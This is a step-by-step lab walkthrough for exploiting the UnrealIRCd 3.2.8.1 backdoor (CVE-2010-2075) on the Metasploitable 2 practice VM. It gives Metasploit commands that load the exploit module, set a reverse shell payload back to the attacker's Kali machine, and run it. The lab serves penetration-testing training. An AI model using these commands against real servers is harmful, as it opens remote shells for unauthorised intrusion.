UnrealIRCd backdoor [CVE-2010-2075]
UnrealIRCd backdoor [CVE-2010-2075]
Note: these labs are extremely oriented to the results, using a step-by-step guidance. During your progress, try to find more information and understand what you are doing.
Requirements
Metaploitable 2
The Metasploitable 2 VM
Metasploitable Framework
Metasploit Framework toolset (installed on Kali Linux by default)
Metasploitable 2 IP
The IP address of the Metasploitable 2 VM. In my case it is 192.168.8.142. This may be different in your specific case.
Kali Linux IP
The IP address of the Kali Linux machine. In my case it is 192.168.8.147. This may be different in your specific case.
Laboratory Workflow
The following describe the different steps to be conducted during the laboratory. You may introduce variations on this and learn from those variations.
1. Launch the Metasploit Framework
msfconsole
2. Search for the appropriate module
search unreal_irc
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution3. Use the module
use exploit/unix/irc/unreal_ircd_3281_backdoor
4. Check the module options
options
5. Set the appropriate options
set RHOSTS 192.168.8.142
6. Show possible payloads
show payloads
7. Select the payload
set PAYLOAD payload/cmd/unix/reverse
8. Show options for payload
show options
9. Fill the options for the payload
set LHOST 192.168.8.147
10. Run the exploit
exploit
Video
Video that resumes everything on this laboratory.

Questions
Now that you have completed this exploitation try to answer to following:
Now, what can I do with the exploitation achieved?
Which type of privileges do I have on the exploited target?
How was this accomplished?
Try to learn more about this vulnerability.
Last updated